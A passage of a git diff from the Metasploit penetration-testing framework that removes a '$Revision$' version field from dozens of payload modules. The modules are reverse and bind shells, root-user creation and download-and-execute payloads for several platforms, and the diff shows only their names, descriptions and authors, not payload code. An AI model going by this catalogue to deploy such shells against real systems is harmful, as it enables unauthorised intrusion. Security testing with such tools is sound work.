+18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Java JSP Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb index 129d2fda3f..4ff0253704 100644 --- a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Java JSP Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/java/shell_reverse_tcp.rb b/modules/payloads/singles/java/shell_reverse_tcp.rb index 9ec5d1fb8b..c8cf54c89c 100644 --- a/modules/payloads/singles/java/shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/shell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Java Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => [ 'mihi', # all the hard work diff --git a/modules/payloads/singles/linux/armle/adduser.rb b/modules/payloads/singles/linux/armle/adduser.rb index c70bda4ceb..8d9de67d96 100644 --- a/modules/payloads/singles/linux/armle/adduser.rb +++ b/modules/payloads/singles/linux/armle/adduser.rb @@ -24,7 +24,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Add User', - 'Version' => '$Revision$', 'Description' => 'Create a new user with UID 0', 'Author' => [ 'Jonathan Salwan' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/armle/exec.rb b/modules/payloads/singles/linux/armle/exec.rb index 0ef9335901..8eb7c19354 100644 --- a/modules/payloads/singles/linux/armle/exec.rb +++ b/modules/payloads/singles/linux/armle/exec.rb @@ -23,7 +23,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Execute Command', - 'Version' => '$Revision$', 'Description' => 'Execute an arbitrary command', 'Author' => 'Jonathan Salwan', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb index d810f36d00..b696fe9717 100644 --- a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'civ', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb index 3676f489de..e3b79898f5 100644 --- a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb @@ -21,7 +21,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Julien Tinnes', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb index c6c0f0ea75..38bb3a6462 100644 --- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb @@ -22,7 +22,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Julien Tinnes', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb index b4bba4e6fd..f4b4e0bb57 100644 --- a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/ppc/shell_find_port.rb b/modules/payloads/singles/linux/ppc/shell_find_port.rb index 57cd7f86cc..1ef2d8dd01 100644 --- a/modules/payloads/singles/linux/ppc/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc/shell_find_port.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb index 4a5822c009..681b2c81d2 100644 --- a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb index 8a10844c49..9fcbbfcb6c 100644 --- a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/ppc64/shell_find_port.rb b/modules/payloads/singles/linux/ppc64/shell_find_port.rb index 60886a9d6e..dc72b95e22 100644 --- a/modules/payloads/singles/linux/ppc64/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc64/shell_find_port.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb index 7f13db99c7..cb120dd01a 100644 --- a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x64/exec.rb b/modules/payloads/singles/linux/x64/exec.rb index 48c6718072..1f48228a4d 100644 --- a/modules/payloads/singles/linux/x64/exec.rb +++ b/modules/payloads/singles/linux/x64/exec.rb @@ -15,7 +15,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Execute Command', - 'Version' => '$Revision$', 'Description' => 'Execute an arbitrary command', 'Author' => 'ricky', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb index 24b14e3bb9..2c1cb6199e 100644 --- a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'ricky', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x64/shell_find_port.rb b/modules/payloads/singles/linux/x64/shell_find_port.rb index 4c2f82c51f..494491b406 100644 --- a/modules/payloads/singles/linux/x64/shell_find_port.rb +++ b/modules/payloads/singles/linux/x64/shell_find_port.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'mak', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb index 521139f06e..0766ee3ad6 100644 --- a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'ricky', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/adduser.rb b/modules/payloads/singles/linux/x86/adduser.rb index e9657cb748..4fdfe16420 100644 --- a/modules/payloads/singles/linux/x86/adduser.rb +++ b/modules/payloads/singles/linux/x86/adduser.rb @@ -25,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Add User', - 'Version' => '$Revision$', 'Description' => 'Create a new user with UID 0', 'Author' => [ 'skape', 'vlad902', 'spoonm' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/chmod.rb b/modules/payloads/singles/linux/x86/chmod.rb index d27acb8945..502424045c 100644 --- a/modules/payloads/singles/linux/x86/chmod.rb +++ b/modules/payloads/singles/linux/x86/chmod.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Chmod', - 'Version' => '$Revision$', 'Description' => 'Runs chmod on specified file with specified mode', 'Author' => 'kris katterjohn', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/linux/x86/exec.rb b/modules/payloads/singles/linux/x86/exec.rb index 20ba8e8481..8261d1441f 100644 --- a/modules/payloads/singles/linux/x86/exec.rb +++ b/modules/payloads/singles/linux/x86/exec.rb @@ -23,7 +23,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Execute Command', - 'Version' => '$Revision$', 'Description' => 'Execute an arbitrary command', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb index 71fda53e43..ad01db5ad0 100644 --- a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb @@ -20,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Meterpreter Service, Bind TCP', - 'Version' => '$Revision$', 'Description' => 'Stub payload for interacting with a Meterpreter Service', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb index bd6a4944be..4beba0b52a 100644 --- a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb @@ -20,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Meterpreter Service, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Stub payload for interacting with a Meterpreter Service', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb index 7205514d16..ade77665e5 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Bind TCP Inline (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection over IPv6 and spawn a command shell', 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb index 82b1dbcefd..646297f00c 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/shell_find_port.rb b/modules/payloads/singles/linux/x86/shell_find_port.rb index f889e65d21..4cd568c671 100644 --- a/modules/payloads/singles/linux/x86/shell_find_port.rb +++ b/modules/payloads/singles/linux/x86/shell_find_port.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/shell_find_tag.rb b/modules/payloads/singles/linux/x86/shell_find_tag.rb index df5ac66edc..f599e6308b 100644 --- a/modules/payloads/singles/linux/x86/shell_find_tag.rb +++ b/modules/payloads/singles/linux/x86/shell_find_tag.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Find Tag Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection (proxy/nat safe)', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb index b42f233e1a..f2a9231650 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb index c01f0246f1..ec1159cc8c 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb @@ -26,7 +26,6 @@ module Metasploit3 # and: puts shellcode.decode super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline - Metasm Demo', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => ['skape', 'Yoann Guillot', 'Julien Tinnes '], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/armle/shell_bind_tcp.rb b/modules/payloads/singles/osx/armle/shell_bind_tcp.rb index eac2ede26f..57a42e48e0 100644 --- a/modules/payloads/singles/osx/armle/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/armle/shell_bind_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Apple iOS Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb b/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb index dfd890453d..d3e414ec41 100644 --- a/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Apple iOS Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/armle/vibrate.rb b/modules/payloads/singles/osx/armle/vibrate.rb index 78e1e94b12..2d39522809 100644 --- a/modules/payloads/singles/osx/armle/vibrate.rb +++ b/modules/payloads/singles/osx/armle/vibrate.rb @@ -17,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Apple iOS iPhone Vibrate', - 'Version' => '$Revision$', 'Description' => %q| Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller . diff --git a/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb b/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb index b09ba6bf37..172a85cf93 100644 --- a/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb index 7f725789cf..09d70c56f3 100644 --- a/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/x64/exec.rb b/modules/payloads/singles/osx/x64/exec.rb index 52ddade53b..c6ddc09c94 100644 --- a/modules/payloads/singles/osx/x64/exec.rb +++ b/modules/payloads/singles/osx/x64/exec.rb @@ -15,7 +15,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X x64 Execute Command', - 'Version' => '$Revision$', 'Description' => 'Execute an arbitrary command', 'Author' => 'argp ', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/x64/say.rb b/modules/payloads/singles/osx/x64/say.rb index 8c33032fee..13939bc380 100644 --- a/modules/payloads/singles/osx/x64/say.rb +++ b/modules/payloads/singles/osx/x64/say.rb @@ -15,7 +15,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OSX X64 say Shellcode', - 'Version' => '$Revision$', 'Description' => 'Say an arbitrary string outloud using Mac OS X text2speech', 'Author' => 'nemo ', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/x64/shell_find_tag.rb b/modules/payloads/singles/osx/x64/shell_find_tag.rb index 9a6d5a9871..9224e29b2a 100644 --- a/modules/payloads/singles/osx/x64/shell_find_tag.rb +++ b/modules/payloads/singles/osx/x64/shell_find_tag.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OSX Command Shell, Find Tag Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection (proxy/nat safe)', 'Author' => 'nemo ', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/x86/exec.rb b/modules/payloads/singles/osx/x86/exec.rb index 5b765dc65f..ec3764ac7e 100644 --- a/modules/payloads/singles/osx/x86/exec.rb +++ b/modules/payloads/singles/osx/x86/exec.rb @@ -25,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Execute Command', - 'Version' => '$Revision$', 'Description' => 'Execute an arbitrary command', 'Author' => [ 'snagg ', 'argp ' ], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb index fc8031c227..1a670141df 100644 --- a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/x86/shell_find_port.rb b/modules/payloads/singles/osx/x86/shell_find_port.rb index 4ed43089e8..f267005029 100644 --- a/modules/payloads/singles/osx/x86/shell_find_port.rb +++ b/modules/payloads/singles/osx/x86/shell_find_port.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb index 24777e497d..740a2d190d 100644 --- a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb index d8214498f7..7346c6b7c6 100644 --- a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X (vfork) Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection, vfork if necessary, and spawn a command shell', 'Author' => 'ddz', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb index 35ef212a7f..dfaebc3696 100644 --- a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X (vfork) Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker, vfork if necessary, and spawn a command shell', 'Author' => 'ddz', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/php/bind_perl.rb b/modules/payloads/singles/php/bind_perl.rb index 587d27544d..e9e2c619a4 100644 --- a/modules/payloads/singles/php/bind_perl.rb +++ b/modules/payloads/singles/php/bind_perl.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Command Shell, Bind TCP (via Perl)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via perl (persistent)', 'Author' => ['Samy ', 'cazz'], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/php/bind_perl_ipv6.rb b/modules/payloads/singles/php/bind_perl_ipv6.rb index 9f6db0d773..0084726f30 100644 --- a/modules/payloads/singles/php/bind_perl_ipv6.rb +++ b/modules/payloads/singles/php/bind_perl_ipv6.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Command Shell, Bind TCP (via perl) IPv6', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via perl (persistent) over IPv6', 'Author' => ['Samy ', 'cazz'], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/php/bind_php.rb b/modules/payloads/singles/php/bind_php.rb index 458bb44c9b..2c5f927a99 100644 --- a/modules/payloads/singles/php/bind_php.rb +++ b/modules/payloads/singles/php/bind_php.rb @@ -20,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Command Shell, Bind TCP (via PHP)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via php', 'Author' => ['egypt', 'diaul ',], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/php/bind_php_ipv6.rb b/modules/payloads/singles/php/bind_php_ipv6.rb index 29a9146a61..8a3c4c6eef 100644 --- a/modules/payloads/singles/php/bind_php_ipv6.rb +++ b/modules/payloads/singles/php/bind_php_ipv6.rb @@ -20,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Command Shell, Bind TCP (via php) IPv6', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via php (IPv6)', 'Author' => ['egypt', 'diaul ',], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/php/download_exec.rb b/modules/payloads/singles/php/download_exec.rb index 0eac8185b1..4cea94c7a1 100644 --- a/modules/payloads/singles/php/download_exec.rb +++ b/modules/payloads/singles/php/download_exec.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'PHP Executable Download and Execute', - 'Version' => '$Revision$', 'Description' => 'Download an EXE from an HTTP URL and execute it', 'Author' => [ 'egypt' ], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/php/exec.rb b/modules/payloads/singles/php/exec.rb index 1b43f391d9..70d0e1a243 100644 --- a/modules/payloads/singles/php/exec.rb +++ b/modules/payloads/singles/php/exec.rb @@ -20,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Execute Command ', - 'Version' => '$Revision$', 'Description' => 'Execute a single system command', 'Author' => [ 'egypt' ], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb index e5ed71d9d4..e7c10347a0 100644 --- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'PHP Meterpreter, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a Meterpreter server (PHP)', 'Author' => ['egypt'], 'Platform' => 'php', diff --git a/modules/payloads/singles/php/reverse_perl.rb b/modules/payloads/singles/php/reverse_perl.rb index 39b4a08f10..8e22900208 100644 --- a/modules/payloads/singles/php/reverse_perl.rb +++ b/modules/payloads/singles/php/reverse_perl.rb @@ -20,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Command, Double reverse TCP connection (via Perl)', - 'Version' => '$Revision$', 'Description' => 'Creates an interactive shell via perl', 'Author' => 'cazz', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/php/reverse_php.rb b/modules/payloads/singles/php/reverse_php.rb index 94eb491163..e5bc0f9485 100644 --- a/modules/payloads/singles/php/reverse_php.rb +++ b/modules/payloads/singles/php/reverse_php.rb @@ -20,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Command Shell, Reverse TCP (via PHP)', - 'Version' => '$Revision$', 'Description' => 'Reverse PHP connect back shell with checks for disabled functions', 'Author' => 'egypt', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/php/shell_findsock.rb b/modules/payloads/singles/php/shell_findsock.rb index 2c0be219be..5c7c227649 100644 --- a/modules/payloads/singles/php/shell_findsock.rb +++ b/modules/payloads/singles/php/shell_findsock.rb @@ -21,7 +21,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Command Shell, Find Sock', - 'Version' => '$Revision$', 'Description' => %Q{ Spawn a shell on the established connection to the webserver. Unfortunately, this payload diff --git a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb index d5edee3391..92b7ab8c2c 100644 --- a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb +++ b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Solaris Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/solaris/sparc/shell_find_port.rb 